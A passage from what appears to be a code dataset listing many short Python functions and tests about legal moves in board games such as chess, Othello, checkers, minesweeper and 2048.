currValue>best_value:\n best_value = currValue\n best_state = s\n for i in range(len(state)):\n for j in range(len(state[i])):\n if state[i][j]== ' ' and best_state[i][j]!= ' ':\n move.insert(0, (i,j))\n \n return move", "def prepare_next_turn(grid):\n empties = get_empty_cells(grid)\n y,x = random.choice(empties)\n grid[y][x] = 2 if random.random() < 0.9 else 4\n return any_possible_moves(grid)", "def make_safe_move(self):\n #iterate through safe moves until you find one that has not yet been played\n for move in self.safes:\n if move not in self.moves_made:\n return move\n #If we make it through the end of the list, return None\n return None", "def legal_moves(player, board):\n return [sq for sq in Othello.squares() if Othello.is_legal(sq, player, board)]", "def action(self):\r\n\r\n\r\n #have we just started?\r\n if self.player_information[\"us\"][\"nTokens\"] == 0:\r\n move = generate_starting_move(self.player_information[\"us\"][\"player_side\"], self.board_array)\r\n return move\r\n\r\n #otherwise do minimax \r\n \r\n #start off with some shallow depth:\r\n if self.turn_no < 5:\r\n depth = 3\r\n else:\r\n depth = 2\r\n \r\n #set a constraint for search depth\r\n if self.total_tokens_on_board < 6:\r\n depth = 3\r\n elif self.total_tokens_on_board < 10:\r\n depth = 2\r\n else:\r\n depth = 1\r\n \r\n #have a time reference\r\n print(f'nthrows: {self.player_information[\"us\"][\"nThrowsRemaining\"]}')\r\n starting_time = int(round(time.time(), 0))\r\n #salvage result from minimax\r\n result = minimax(self.board_dict.copy(), self.player_tokens.copy(), self.co_existance_dict.copy(),\r\n None, None, None, depth, True, -math.inf, math.inf,\r\n (-5, -5), self.player_information.copy(), self.board_array, self.board_edge, \r\n starting_time, True, self.turn_no)\r\n\r\n #clean it up a bit \r\n print(self.board_dict)\r\n #tidy it up\r\n result = result[0]\r\n print(f'pre: {result}')\r\n #in case we get a bad move redo but make it very shallow\r\n if len(result) == 1 or result == (-5, -5):\r\n #force it to return a usable move\r\n counter = 0\r\n while (len(result) == 1) or (result == (-5, -5)):\r\n result = minimax(self.board_dict.copy(), self.player_tokens.copy(), self.co_existance_dict.copy(),\r\n None, None, None, 1, True, -math.inf, math.inf,\r\n (-5, -5), self.player_information.copy(), self.board_array, self.board_edge, \r\n starting_time, False, self.turn_no)\r\n result = result[0]\r\n counter += 1\r\n \r\n #if its taking too long\r\n if counter > 2: \r\n #generate one random possible move to use \r\n allied_tokens = [token for token in self.player_tokens if self.player_tokens[token] == \"us\"]\r\n move_list = generate_moves(self.board_dict, self.player_tokens, self.co_existance_dict, allied_tokens,\r\n self.player_information, self.board_array, True, \"all\")\r\n \r\n \r\n #if there are no moves\r\n if len(move_list) == 0:\r\n if self.player_information['us']['nThrowsRemaining'] > 0:\r\n throws = generate_possible_throws(self.board_dict, self.player_tokens, self.co_existance_dict, self.player_information, \"us\",\r\n self.player_information[\"us\"][\"player_side\"], self.board_array, \"all\" )\r\n result = random.choice(throws)\r\n \r\n else:\r\n result = random.choice(move_list)\r\n print(f'random: {result}')\r\n break\r\n\r\n print(f' inside: {result}')\r\n\r\n print(result)\r\n #otherwise clean it up\r\n if result[0] == 'throw':\r\n final_result = (result[0].upper(), result[1], result[2])\r\n else:\r\n final_result = (result[0].upper(), result[2], result[3])\r\n # return final result \r\n return final_result", "def legal_moves(self, player, board):\r\n #go through the whole board and check whether the piece is on the board or not\r\n #num/row size - num%col == num2/row size - num@%col\r\n #num/row size + num%col\r\n moves = list()\r\n opp = self.opponent(player)\r\n #print(board)\r\n for i in self.squares():\r\n if board[i] == core.EMPTY:\r\n for d in core.DIRECTIONS:\r\n endPt = self.find_bracket(i, player, board, d)\r\n if endPt!= None:\r\n moves.append(i)\r\n break\r\n\r\n return moves", "def _is_valid_move(self, vector, current_piece, other_piece):\n return True", "def validate_move(self, move_from, move_to, board):\n\n pass", "def get_legal_moves(self, pos: Position, game_board: GameBoard) -> PossibleMoveSet:\n pass", "def test_legalMoveP_backwards_goose(self):\n rules_obj = rules.Rules(test_mode=True)\n board = gamenode.GameNode()\n startCoordinate = coordinate.Coordinate(3, 1)\n endCoordinate = coordinate.Coordinate(3, 2)\n board.setState(startCoordinate, types.GOOSE)\n actual_result = rules_obj.legalMoveP(board,\n startCoordinate,\n endCoordinate)\n expected_result = False\n self.assertEqual(actual_result, expected_result)", "def _ispinnedmove(self, from_, to_):\n return False", "def valid_move(self, player, move):\n return (True)", "def is_legal_move(player, row_from, col_from, row_to, col_to):\r\n illegal_moves = [(0, 0), (2, 0), (0, 4), (2, 4)]\r\n\r\n \"\"\"special moves that are move available according to diagram\r\n List of tuples to and from values that are not possible\"\"\"\r\n moves_not_permitted = [[(0, 2), (1, 1)], [(0, 2), (1, 3)], [(1, 1), (2, 2)], [(1, 3), (2, 2)]]\r\n row_diff = abs(row_from - row_to)\r\n col_diff = abs(col_from - col_to)\r\n\r\n if player == 'hounds':\r\n\r\n if (row_to >= 0 and row_to < 3 and col_to >= 0 and col_to < 5):\r\n \"\"\"Check if the move is not out of bounds for the board with max col range 4 and row range 3\r\n and then check if it is a legal move\"\"\"\r\n\r\n if board[row_to][col_to] == 0 and (row_to, col_to) not in illegal_moves and row_diff <= 1 and col_diff <= 1:\r\n \"\"\" Check if the position is blank.\r\n Then check if the move is not one of the blank places\r\n Then check if the row difference and column difference isn't more than 1\r\n \"\"\"\r\n if (col_to - col_from) < 0: # no moves to the left of the board\r\n return False\r\n\r\n for item in moves_not_permitted:\r\n if len(set([(row_from, col_from), (row_to, col_to)]).intersection(set(item))) == 2:\r\n \"\"\" If to and from co-ordinates are present in the moves_not_permitted list then return False\"\"\"\r\n return False\r\n else:\r\n pass\r\n return True\r\n else:\r\n return False\r\n\r\n else:\r\n \"\"\"When player is a hare\"\"\"\r\n\r\n if (row_to >= 0 and row_to < 3 and col_to >= 0 and col_to < 5):\r\n \"\"\"Check if the move is not out of bounds for the board with max col range 4 and row range 3\r\n and then check if it is a legal move\"\"\"\r\n\r\n if board[row_to][col_to] == 0 and (row_to, col_to) not in illegal_moves and row_diff <= 1 and col_diff <= 1:\r\n \"\"\" Check if the position is blank.\r\n Then check if the move is not one of the blank places\r\n Then check if the row difference and column difference isn't more than 1\"\"\"\r\n\r\n for item in moves_not_permitted:\r\n if len(set([(row_from, col_from), (row_to, col_to)]).intersection(set(item))) == 2:\r\n \"\"\" If to and from co-ordinates are present in the moves_not_permitted list then return False\"\"\"\r\n return False\r\n else:\r\n pass\r\n return True\r\n\r\n else:\r\n return False", "def check_move(self, move):\n\n if str(move) in self.moves_made:\n return False\n return True", "def possible(state_board,turn):\n\tlegal_moves = [] # list of legal moves as Move objects\n\tfor i in range(1,9):\n\t\tfor j in range(1,9):\n\t\t\tif state_board[i][j] == 0:\n\t\t\t\tif flipper([i,j],turn,state_board) != []:\n\t\t\t\t\t# if there are flipped pieces, it appends this move to\n\t\t\t\t\t# the legal moves and draws it in light greens\n\t\t\t\t\tlegal_moves.append((i,j))\n\t\t\t\t\tdrawPiece((i,j),3)\n\t\t\t\telse:\n\t\t\t\t\t# if it is 0 and is not legal, make sure it is of bgcolor\n\t\t\t\t\tdrawPiece((i,j),0)\n\t\n\treturn legal_moves", "def any_legal_move(player, board):\n return any(Othello.is_legal(sq, player, board) for sq in Othello.squares())", "def moves(self, board_state):\n # pos_moves = generate_moves(board_state) # Naive moves function here\n blacks = board_state.search_board('B')\n # Generate the possible moves required to kill the first black piece\n # on the board\n pos_moves = sorted_generate_moves_piece(board_state, blacks[0])\n return pos_moves", "def is_valid(self, move):\r\n return move > 10 and move < 89", "def legal_move(self, move, state = None):\n if state is None:\n state = copy(self.state)\n else:\n state = copy(state)\n return state[move // state.shape[0], move % state.shape[0]] == 0", "def test_does_not_move(self):\n Herbivore.set_parameters({\"mu\": 0})\n nt.assert_false(self.herb.check_migrate())", "def test_move_knight_legally_blocked(self):\n for piece in [('N', True), ('N', False)]:\n self.c.board = \\\n [[('K', piece[1]) for i in range(8)] for i in range(8)]\n self.c.turn = piece[1]\n self.c.board[4][4] = piece\n for dest in ['d6', 'f6', 'c5', 'g5', 'c3', 'g3', 'd2', 'f2']:\n self.groups['dest'] = dest\n self.assertRaises(\n MoveNotLegalError, self.c._knight_evaluator, self.groups)", "def safe_moves(p, state):\n\n x, y = state['players'][p]['x'], state['players'][p]['y']\n\n moves = []\n actions = [(1, 0, 'east'),\n (-1, 0, 'west'),\n (0, -1, 'north'),\n (0, 1, 'south')]\n for dx, dy, move in actions:\n tx, ty = str(x + dx), str(y + dy)\n if tx not in state['cells'] or ty not in state['cells'][tx]:\n moves.append(move)\n\n return moves", "def make_safe_move(self):\n for i in self.safes:\n if i not in self.moves_made:\n return i\n #raise NotImplementedError", "def is_legal_move(self, house_num):\n return True", "def _check_for_ko(self):\n try:\n if self._array == self._history[-2][0]:\n self._pop_history()\n raise BoardError('Cannot make a move that is redundant!')\n except IndexError:\n # Insufficient history...let this one slide\n pass", "def get_legal_moves(self):\n moves = []\n if self.player_locations[self.whose_turn] is None:\n return self.get_blank_locations()\n matrix = [(1,0), (-1,0), (0,1), (0,-1), (1,1), (1,-1), (-1, 1), (-1,-1)]\n\n for dx, dy in matrix:\n x,y = self.player_locations[self.whose_turn]\n while x+dx <= xdim and x+dx >= 0 and y+dy <= ydim and y+dy >= 0:\n x = x+dx\n y = y+dx\n if self.board[x][y] : break\n moves.append((x,y))\n return moves", "def no_more_move(self):\n if (self.p_no_move + self.c_no_move == 2):\n return True\n return False", "def legalMove(turtles, poles, m, n, count):\n if len(poles[m]) != 0 and (len(poles[n]) == 0 or poles[m][-1] < poles[n][-1]): #one possible legal move btwn m and n\n moveTurt(turtles[poles[m][-1] - 1], n, count)\n poles[n].append(poles[m].pop())\n if len(poles[0]) == 0 and len(poles[1]) == 0:\n return\n elif len(poles[n]) != 0 and (len(poles[m]) == 0 or poles[n][-1] < poles[m][-1]): #other possible legal move btwn m and n\n moveTurt(turtles[poles[n][-1] - 1], m, count)\n poles[m].append(poles[n].pop())", "def get_legal_moves(self, player: int) -> np.ndarray:\n stage2 = self.is_stage2()\n action_mask = np.zeros((24, 5, 25), dtype=bool)\n # if stage 1 add set options\n array_board = np.array(self.board)\n if not stage2:\n legal_pos = np.where(array_board == 0)[0]\n for pos in legal_pos:\n if self.is_mill(player, pos, self.board): # current selection completes a mill\n opp_pos = np.where(array_board == -player)[0]\n opp_pos = [opp_p for opp_p in opp_pos if\n not self.is_mill(-player, opp_p, self.board)] # can't remove opponent in mill\n if len(opp_pos) == 0: # exception for the case where all opponents pieces are in mills\n opp_pos = np.where(array_board == -player)[0]\n action_mask[pos, -1, opp_pos] = True\n else:\n action_mask[pos, -1, -1] = True # place piece on board\n else:\n from_pos_cands = np.where(array_board == player)[0]\n for from_pos in from_pos_cands:\n mill_cands = [(orient, adj) for orient, adj in enumerate(self.adjacent[from_pos]) if\n adj is not None and self.board[adj] == 0] # TODO added not, need to validate\n if_played_board = self.board.copy()\n if_played_board[from_pos] = 0\n for (orient, adj) in mill_cands:\n if self.is_mill(player, adj, if_played_board):\n opp_pos = np.where(array_board == -player)[0]\n opp_pos = [opp_p for opp_p in opp_pos if not self.is_mill(-player, opp_p, if_played_board)]\n if len(opp_pos) == 0: # exception for the case where all opponents pieces are in mills\n opp_pos = np.where(array_board == -player)[0]\n action_mask[from_pos, orient, opp_pos] = True\n else:\n action_mask[from_pos, orient, -1] = True\n\n return action_mask", "def getPossibleMoves(self): # called to get possible positions this piece can go\r\n \r\n moves = {}\r\n\r\n ids = []\r\n\r\n for piece in self.board.pieces.values():\r\n if piece.name == \"empty\":\r\n piece.glow = False\r\n piece.ready = False\r\n\r\n self.piece = self\r\n\r\n def check(direction=\"left\", heading=\"north\", x=None, y=None):\r\n piece = self.piece\r\n if direction == \"left\": x -= 50\r\n else: x += 50\r\n\r\n if heading == \"north\": y -= 50\r\n else: y += 50\r\n\r\n if (x, y) in self.board.pieces: # position is empty\r\n empty = self.board.getPiece((x, y))\r\n empty.glow = True\r\n old, new, obj = (direction, heading), (x, y), piece\r\n identity = self.getRandomID(ids) # get an ID for the move\r\n moves[identity] = old, new, obj\r\n\r\n if piece.isKing: # piece is a king, so go on\r\n check(direction, heading, x, y)\r\n else: # its not empty, so check if its comrade\r\n x1, y1 = x+25, y+25\r\n piece2 = self.board.getPiece((x1, y1))\r\n try:\r\n if piece.isComrade(piece2):# piece is comrade so return\r\n return\r\n else: # piece is not comrade, so check empty\r\n if direction == \"left\": x2 = x1-25-50\r\n else: x2 = x1-25+50\r\n\r\n if heading == \"north\": y2 = y1-25-50\r\n else: y2 = y1-25+50\r\n\r\n if (x2, y2) in self.board.pieces: # its empty, so notify player\r\n empty = self.board.getPiece((x2, y2))\r\n empty.glow = True\r\n empty.ready = True\r\n\r\n old, new, obj = (direction, heading), (x2, y2), piece2\r\n identity = self.getRandomID(ids)\r\n moves[identity] = old, new, obj\r\n\r\n check(direction, heading, piece2.x-25, piece2.y-25)\r\n check(direction, heading, x2, y2)\r\n \r\n # check empty or comrade again\r\n if direction == \"left\": x3 = x2-50\r\n else: x3 = x2+50\r\n\r\n if heading == \"north\": y3 = y2-50\r\n else: y3 = y2+50\r\n\r\n if (x3, y3) in self.board.pieces: # positon(address) is empty\r\n return\r\n else: # there is a piece, so check if comrade, stop, if not comrade continue\r\n x3+=25\r\n y3+= 25\r\n\r\n piece3 = self.board.getPiece((x3, y3))\r\n if piece3.isComrade(piece2): # comrades, so stop\r\n return\r\n else: # not comrades, so continue\r\n self.piece = piece3\r\n check(direction, heading, x, y)\r\n\r\n #self.piece = piece2\r\n \r\n #check(direction, heading, x2, y2) # keep searching\r\n else: # its not empty, so return\r\n return\r\n except:\r\n pass\r\n\r\n if self.piece.name == \"white\": direction = \"north\"\r\n else: direction = \"south\"\r\n \r\n check(\"left\", direction, self.piece.x-25, self.piece.y-25)\r\n check(\"right\", direction, self.piece.x-25, self.piece.y-25)\r\n \r\n if self.piece.isKing:\r\n if self.piece.name == \"white\": heading = \"south\"\r\n else: heading = \"north\"\r\n \r\n check(\"left\", heading, self.piece.x-25, self.piece.y-25)\r\n check(\"right\", heading, self.piece.x-25, self.piece.y-25)\r\n\r\n if self.piece.name == \"white\":\r\n eatMoves = self.board.game.thinkEatMoves(moves, \"person\")\r\n if eatMoves is not None:\r\n return eatMoves\r\n\r\n return moves", "def _valid_move_exists(self):\n lst = []\n for i_row in range(self._num_rows):\n for i_col in range(self._num_cols):\n if self._valid_placement(i_row, i_col)[0]:\n lst.append((i_row, i_col))\n\n return lst != [] #If lst != [], then the list has elements -> valid move(s) exist", "def legalMoves(self):\n return [c for c in range(self.getWidth()) if len([r for r in range(self.getHeight()) if self.cell[c][r]==EMPTY])>0 ]", "def prepare_next_turn(grid):\n\tempties = get_empty_cells(grid)\n\ty,x = random.choice(empties)\n\tgrid[y][x] = 2 if random.random() < prob_2 else 4\n\treturn any_possible_moves(grid)", "def make_safe_move(self):\n # This is just a pop of a safe move\n next_moves = self.safes - self.moves_made\n if len(next_moves) != 0:\n move = next_moves.pop()\n self.moves_made.add(move)\n self.mark_safe(move)\n return move\n return None", "def is_valid_move(self, somerow, somecol):\n bool_1 = self.board[somerow][somecol] != 1\n bool_2 = self.num_queens_placed < self.size \n bool_3 = self.attack(somerow, somecol)\n return bool_1 and bool_2 and bool_3", "def legal_move_on(draw, board):\n start, _ = draw(strategies.sampled_from(sorted(board.pieces)))\n end = draw(strategies.sampled_from(sorted(board.movable_from(start))))\n return start, end", "def disable_moves(self):\r\n self.board.disable_moves()", "def valid_move(x, y):\r\n if [x, y] in empty_cells(board):\r\n return True\r\n else:\r\n return False", "def checkLegalMove(self, initialPosition, destinationPosition, colorIndex):\n checkColor = self.grid.REPRESENTATION[colorIndex]\n otherColor = self.grid.REPRESENTATION[1-colorIndex]\n emptyColor = self.grid.REPRESENTATION[2]\n if self.grid[initialPosition] != checkColor:\n print 'The piece you are trying to move is not yours! Please reselect your move.'\n return False\n if self.grid[destinationPosition] != emptyColor:\n print 'The destination position of your move is not empty! Please reselect your move.'\n return False\n if initialPosition == destinationPosition:\n print 'The initial and destination position of your move are the same. Please reselect your move.'\n return False\n\n if initialPosition[0] == destinationPosition[0]:\n x = initialPosition[0]\n if (destinationPosition[1] - initialPosition[1]) %2 != 0:\n print 'Invalid move! Please reselect your move.'\n return False\n if initialPosition[1] < destinationPosition[1]:\n for i in range(initialPosition[1]+1, destinationPosition[1], 2):\n if self.grid[(x, i)] != otherColor or self.grid[(x, i+1)] != emptyColor:\n print 'Invalid move! Please reselect your move.'\n return False\n return True\n else:\n for i in range(initialPosition[1]-1, destinationPosition[1], -2):\n if self.grid[(x, i)] != otherColor or self.grid[(x, i-1)] != emptyColor:\n print 'Invalid move! Please reselect your move.'\n return False\n return True\n elif initialPosition[1] == destinationPosition[1]:\n y = initialPosition[1]\n if (destinationPosition[0] - initialPosition[0])%2 != 0:\n print 'Invalid move! Please reselect your move.'\n return False\n if initialPosition[0] < destinationPosition[0]:\n for i in range(initialPosition[0]+1, destinationPosition[0], 2):\n if self.grid[(i, y)] != otherColor or self.grid[(i+1, y)] != emptyColor:\n print 'Invalid move! Please reselect your move.'\n return False\n return True\n else:\n for i in range(initialPosition[0]-1, destinationPosition[0], -2):\n if self.grid[(i, y)] != otherColor or self.grid[(i-1, y)] != emptyColor:\n print 'Invalid move! Please reselect your move.'\n return False\n return True\n # make turns\n print 'Making turns is invalid move! Please reselect your move.'\n return False", "def is_valid_move(x:int, y:int,board_length) -> bool:\n if x < 0 or y < 0 or x == board_length or y == board_length:\n return False\n return True", "def clear_moves(self):\n [x.set_board() for x in self.pieces if x.get_state() == MOVE]", "def execution(move,legal,board,player):\r\n \r\n if player == 1:\r\n if move in legal:\r\n for i in range(0,len(board.white)):\r\n if board.white[i] == move[0]:\r\n board.white[i] = move[1]\r\n if len(move) == 3:\r\n board.black.remove(move[-1])\r\n\r\n else:\r\n print(\"Illegal move, please input a legal move\")\r\n human_move(board,player)\r\n else:\r\n if move in legal:\r\n if len(move) == 3:\r\n board.white.remove(move[-1])\r\n for i in range(0,len(board.black)):\r\n if board.black[i] == move[0]:\r\n board.black[i] = move[1]\r\n else:\r\n print(\"Illegal move, please input a legal move\")\r\n human_move(board,player)", "def is_rook_move_valid(self, from_row, from_col, to_row, to_col):\n # if not on same column or row\n if ((from_row != to_row and from_col != to_col) or\n (from_row == to_row and from_col == to_col)):\n return False\n\n # check if any pieces are in the way of destination\n if from_row != to_row:\n dc = 0\n dr = 1 if to_row - from_row > 0 else -1\n if from_col != to_col:\n dr = 0\n dc = 1 if to_col - from_col > 0 else -1\n dm = abs(to_row - from_row)\n\n retVal = self._any_piece_in_way(from_row, from_col, dr, dc, dm, toRow=to_row, toCol=to_col)\n\n # Casting: Rook invalidation\n if retVal and (from_row == 0 or from_row == 7):\n piece = self.board.squares[from_row][from_col]\n piece_color = self.piece_color(piece)\n if piece_color == \"white\":\n if from_col == 0:\n self.whiteCanCastleQside = False\n elif from_col == 7:\n self.whiteCanCastleKside = False\n else:\n if from_col == 0:\n self.blackCanCastleQside = False\n elif from_col == 7:\n self.blackCanCastleKside = False\n\n return retVal", "def test_not_unopposed(self):\n s1 = self.battle.create_skirmish(self.alice, 2) # Attack 2\n s1.react(self.bob, 1) # --Attack 1\n s1.resolve()\n self.assertFalse(s1.unopposed)", "def make_safe_move(self):\n for safe in self.safes:\n if not safe in self.moves_made and not safe in self.mines:\n return safe\n\n return None", "def is_move_valid(move: Move, board: Board, whites_turn: bool) -> bool:\n if out_of_bounds(move[0]) == True or out_of_bounds(move[1]) == True:\n return False\n \n if move[0] == move[1]:\n return False\n\n if is_current_players_piece(piece_at_position(move[0], board), False) and whites_turn == True:\n return False\n elif is_current_players_piece(piece_at_position(move[0], board), True) and whites_turn == False:\n return False\n\n\n if piece_at_position(move[1], board) in WHITE_PIECES and whites_turn == True:\n return False\n elif piece_at_position(move[1], board) in BLACK_PIECES and whites_turn == False:\n return False\n\n\n if move[1] not in get_possible_moves(move[0], board):\n return False\n\n\n test_board = board\n test_board = update_board(test_board, move)\n if is_in_check(test_board, True) and whites_turn == True:\n return False\n elif is_in_check(test_board, False) and whites_turn == False:\n return False\n\n return True", "def is_valid_move(state, move):\n row, col = move\n if row not in [1, 2, 3] or col not in [1, 2, 3]:\n print(\"Invalid move! Specify correct game square!\")\n return False\n if state[row-1][col-1] != '_':\n print('Invalid move! Place your marker on a free square!')\n return False\n return True", "def legal_moves(board,player=None):\r\n \r\n possible_moves = []\r\n moves = []\r\n if player == None:\r\n moves += board.white + board.black\r\n elif player == -1:\r\n moves += board.black\r\n elif player == 1:\r\n moves += board.white\r\n \r\n captured = False\r\n for pos in moves:\r\n if pos[0] == 'A':\r\n m = [-8,-7,1,8,9]\r\n elif pos[0] == 'H':\r\n m = [-9,-8,-1,7,8]\r\n else:\r\n m = [-9,-8,-7,-1,1,7,8,9]\r\n loc = decode(pos)\r\n for i in m:\r\n captured = capture(board, player, possible_moves, pos, loc, i)\r\n canter(board, player, possible_moves, pos, loc, i)\r\n plain(board, player, possible_moves, pos, loc, i)\r\n \r\n if captured:\r\n enemy_list = []\r\n for capturing_move in possible_moves:\r\n if len(capturing_move) == 3:\r\n enemy_list.append(capturing_move)\r\n possible_moves = list(enemy_list)\r\n\r\n return possible_moves", "def verify_legal_move(self, direction):\n for b_x, b_y in self.get_block_positions(self.active_piece.FIGURE):\n\n if direction == \"LEFT\":\n b_x -= 1\n elif direction == \"RIGHT\":\n b_x += 1\n elif direction == \"DOWN\":\n b_y += 1\n else:\n raise ValueError\n\n if b_x < 0 or b_x >= self.WIDTH:\n return False\n\n if b_y < 0 or b_y >= self.HEIGHT:\n return False\n\n if self.board[b_y][b_x] != 0:\n return False\n return True", "def validate_move(move):\n if move[0] in cc.VALID_RANKS and move[1] in cc.VALID_RANKS:\n valid = True\n else:\n valid = False\n return valid", "def test_move_over_past(self):\n b1 = board.Board(self.small_plain)\n start = np.array((3, 3), dtype='int')\n k1 = knight.Knight(b1,start)\n # set move choice 0\n move_choice = 0\n # change the board layout to reflect the move\n k1.execute_move(move_choice)\n self.assertTrue((k1.position == np.array((5, 4), dtype='int')).all())\n # try to go back in strict mode (fail)\n move_choice = 3\n k1.execute_move(move_choice, strict=True)\n # confirm lack of movement\n self.assertTrue((k1.position == np.array((5, 4), dtype='int')).all())\n # confirm state of board\n with capture_output() as (out, _):\n b1.display()\n my_out = out.getvalue().strip()\n out.close()\n out_list = [ each.strip() for each in\n \"\"\". . . . . . . .\n . . . . . . . .\n . . . . . . . .\n . . . S . . . .\n . . . x . . . .\n . . . x K . . .\n . . . . . . . .\n . . . . . . . .\"\"\".split('\\n')]\n expected_out = '\\n'.join(out_list)\n self.assertEqual(my_out, expected_out)\n # try to go back without strict mode\n move_choice = 3\n k1.execute_move(move_choice, strict=False)\n # confirm lack of movement\n self.assertTrue((k1.position == np.array((4, 2), dtype='int')).all())\n # confirm state of board\n with capture_output() as (out, _):\n b1.display()\n my_out = out.getvalue().strip()\n out.close()\n out_list = [ each.strip() for each in\n \"\"\". . . . . . . .\n . . . . . . . .\n . . . . . . . .\n . . . S . . . .\n . . K x . . . .\n . . x x S . . .\n . . . . . . . .\n . . . . . . . .\"\"\".split('\\n')]\n expected_out = '\\n'.join(out_list)\n self.assertEqual(my_out, expected_out)", "def make_move(self, move, check_valid=True):\r\n self.board[move.sr][move.sc] = \"--\"\r\n self.board[move.er][move.ec] = move.pieceMoved\r\n self.moveLog.append(move)\r\n self.turn_white = not self.turn_white\r\n if move.pieceMoved == 'wk':\r\n self.wKingPos = (move.er, move.ec)\r\n elif move.pieceMoved == 'bk':\r\n self.bKingPos = (move.er, move.ec)\r\n\r\n if move.isEnpassantMove:\r\n self.board[move.sr][move.ec] = \"--\"\r\n\r\n if move.pieceMoved[1] == 'p' and abs(move.sr - move.er) == 2:\r\n self.enpas_pos = ((move.er + move.sr) // 2, move.ec)\r\n else:\r\n self.enpas_pos = ()\r\n\r\n if move.isPawnPromotion and not check_valid:\r\n promoted_piece = \"a\"\r\n while promoted_piece not in ('q', 'r', 'b', 'n'):\r\n promoted_piece = input(\"Promote to q, r, b, or n: \")\r\n self.board[move.er][move.ec] = move.pieceMoved[0] + promoted_piece\r\n\r\n # castle\r\n if move.castle:\r\n if move.ec - move.sc == 2:\r\n self.board[move.er][move.ec - 1] = self.board[move.er][move.ec + 1]\r\n self.board[move.er][move.ec + 1] = '--'\r\n else:\r\n self.board[move.er][move.ec + 1] = self.board[move.er][move.ec - 2]\r\n self.board[move.er][move.ec - 2] = '--'\r\n\r\n # castle rights on rook, king move\r\n self.update_castle_rights(move)\r\n self.castleRightsLog.append(CastleRights(self.cr_castle_r.wks, self.cr_castle_r.bks,\r\n self.cr_castle_r.wqs, self.cr_castle_r.bqs))", "def _finish_all_moves(self, current_time):\n\t\tfor piece_id in self.all_piece_ids:\n\t\t\tstate = getattr(self, piece_id)\n\t\t\tif len(state) == 0:\n\t\t\t\tcontinue\n\t\t\tpiece = Piece(state)\n\t\t\tif piece.moving:\n\t\t\t\tif piece.end_time <= current_time:\n\t\t\t\t\tself._finish_move(piece_id, piece, current_time)", "def actions(board):\n avail_moves = set()\n\n for i in range(3):\n for j in range(3):\n if board[i][j] == EMPTY:\n avail_moves.add((i,j))\n \n if len(avail_moves) == 0:\n return 0\n\n return avail_moves", "def randomMove(board):\r\n go = True\r\n while go:\r\n y = random.randint(0, board.size - 1)\r\n x = random.randint(0, board.size - 1)\r\n go = not board.validMove((y, x))\r\n return (y, x)", "def untried_actions(self):\r\n if self._untried_actions is None:\r\n self._untried_actions = self.state.get_legal_moves()\r\n return self._untried_actions", "def check_legal(self, cur_pos, new_pos, board, state):\n new_row = self.ind(new_pos)[0]\n new_col = self.ind(new_pos)[1]\n cur_row = self.ind(cur_pos)[0]\n cur_col = self.ind(cur_pos)[1]\n \n if state == \"UNFINISHED\":\n # Make sure the position you're going into isn't your own piece\n if board[new_row][new_col] is not None:\n if self.piece_type(new_pos, board).get_color() == self._color:\n return False\n # Check if you're in the palace\n if new_pos in self._special: # Make sure that the piece it's trying to take isn't it's own\n if board[new_row][new_col] is not None:\n if self.piece_type(new_pos, board).get_color() == self._color:\n return False \n # Checking if the movement is left or right (one column apart) from the cur_pos\n if (new_col == cur_col + 1 or new_col == cur_col - 1) and new_row == cur_row:\n return True\n\n # Checking if forward movement is legal\n elif self._color == 'BLUE':\n print(\"this soldier is blue\")\n if new_row == cur_row - 1 and new_col == cur_col:\n print(\"The blue soldier is trying to move forward\")\n # cant take your own piece\n if self.piece_type(new_pos, board) is not None:\n print(\"There's a piece here\")\n if self.piece_type(new_pos, board).get_color == self._color:\n print(\"Trying to take it's own color piece\")\n return False\n return True\n elif self._color == 'RED':\n print(\"this soldier is red\")\n if new_row == cur_row + 1 and new_col == cur_col:\n print(\"The red soldier is trying to move forward\")\n if self.piece_type(new_pos, board) is not None:\n print(\"There's a piece here\")\n if self.piece_type(new_pos, board).get_color == self._color:\n print(\"Trying to take it's own color piece\")\n return False\n return True\n else:\n return False\n else:\n return False", "def is_legal_move(self, start_pos, end_pos, start_piece, end_piece_player_id, board):\r\n parsed_positions = self.parse_positions(start_pos, end_pos)\r\n\r\n start_row = parsed_positions[0]\r\n start_col = parsed_positions[1]\r\n end_row = parsed_positions[2]\r\n end_col = parsed_positions[3]\r\n count = 0 # Count will track how many pieces are between start and end_pos\r\n\r\n if start_row != end_row and start_col != end_col: # Moving diagonally\r\n return False\r\n\r\n # If cannon moves to an empty position\r\n # if end_piece_player_id is None:\r\n\r\n if start_row == end_row: # Moving horizontally\r\n col_difference = end_col - start_col\r\n\r\n if col_difference > 0: # Moving to the right of the board\r\n for col in range(start_col + 1, end_col): # Checks if there is a piece between start_col and end_col\r\n if board[start_row][col].get_piece() is not None:\r\n count += 1\r\n\r\n if col_difference < 0: # Moving to the left of the board\r\n for col in range(start_col - 1, end_col, -1): # Checks to the left of the board\r\n # If there is a piece to block movement to the end_pos, return False\r\n if board[start_row][col].get_piece() is not None:\r\n count += 1\r\n\r\n if start_col == end_col: # Moving vertically\r\n row_difference = end_row - start_row\r\n\r\n if row_difference > 0: # Moving down the board\r\n for row in range(start_row + 1, end_row):\r\n if board[row][start_col].get_piece() is not None: # If no piece is impeding path to end_pos\r\n count += 1\r\n\r\n\r\n if row_difference < 0: # Moving up the board\r\n for row in range(start_row -1, end_row, -1):\r\n if board[row][start_col].get_piece() is not None: # If no piece is impeding path to end_pos\r\n count += 1\r\n\r\n # 1 piece between start_pos and end_pos and end_pos contains a chess piece\r\n if count == 1 and end_piece_player_id is not None:\r\n return True\r\n # end_pos has no piece and there are no pieces to impede path\r\n elif end_piece_player_id is None and count == 0:\r\n return True\r\n # Returns False for all other scenarios\r\n else:\r\n return False", "def check_move_states(self, player, depth):\n\n if depth >= self.look_ahead:\n return True\n\n for move in gen_moves(player, self.__state.board, self.checker):\n self.__state.push(move)\n winner = self.checker.check_game_over(self.__pid, self.__opponent)\n if winner == self.__opponent:\n return False\n worker = move['xy2']\n if not self.check_build_states(player, worker, depth):\n return False\n self.__state.pop()\n return True", "def make_random_move(self):\n # get copy of the empty board\n board = set([(i, j) for i in range(self.height) for j in range(self.width)])\n\n for move in board:\n if not move in self.moves_made and not move in self.mines:\n return move\n\n return None", "def test_out_of_maze_colision(self):\n manager = DummyLevelManager()\n game = Game(manager)\n game.move(GameMoves.DOWN)\n for i in range(5):\n state = game.move(GameMoves.PASS)\n self.assertEquals(state, LevelState.RUNNING)\n state = game.move(GameMoves.PASS)\n self.assertEqual(state, LevelState.LOSE)", "def make_safe_move(self):\n \n safe_moves = self.safes.copy()\n\n safe_moves -= self.moves_made\n\n if len(safe_moves) == 0:\n return None\n\n return safe_moves.pop()", "def cancel_move(self):\n self.should_move = False", "def 